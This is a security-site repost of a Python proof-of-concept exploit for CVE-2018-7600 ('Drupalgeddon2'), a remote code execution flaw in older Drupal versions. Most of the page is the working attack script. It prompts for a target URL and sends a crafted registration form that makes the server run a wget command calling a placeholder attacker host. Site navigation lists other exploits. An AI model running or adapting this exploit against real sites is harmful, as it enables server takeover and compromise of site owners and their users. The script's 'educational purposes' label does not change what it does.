首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execut
来源:https://github.com/a2u 作者:Rudnykh 发布时间:2018-04-16  
#!/usr/bin/env
import sys
import requests
 
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
 
target = raw_input('Enter target url (example: https://domain.ltd/): ')
 
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}
 
r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·F5 BIG-IP 11.6 SSL Virtual Ser
·Drupal < 7.58 / < 8.3.9 / < 8.
·SysGauge Pro 4.6.12 Local Buff
·MikroTik 6.41.4 - FTP daemon D
·Google Chrome V8 JIT - 'LoadEl
·GNU Beep 1.3 - 'HoleyBeep' Loc
·DVD X Player Standard 5.5.3.9
·Barco ClickShare CSE-200 - Rem
·CyberArk Password Vault Web Ac
·Microsoft Windows Kernel (Wind
·CyberArk Password Vault < 9.7
·Microsoft Windows Kernel (Wind
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved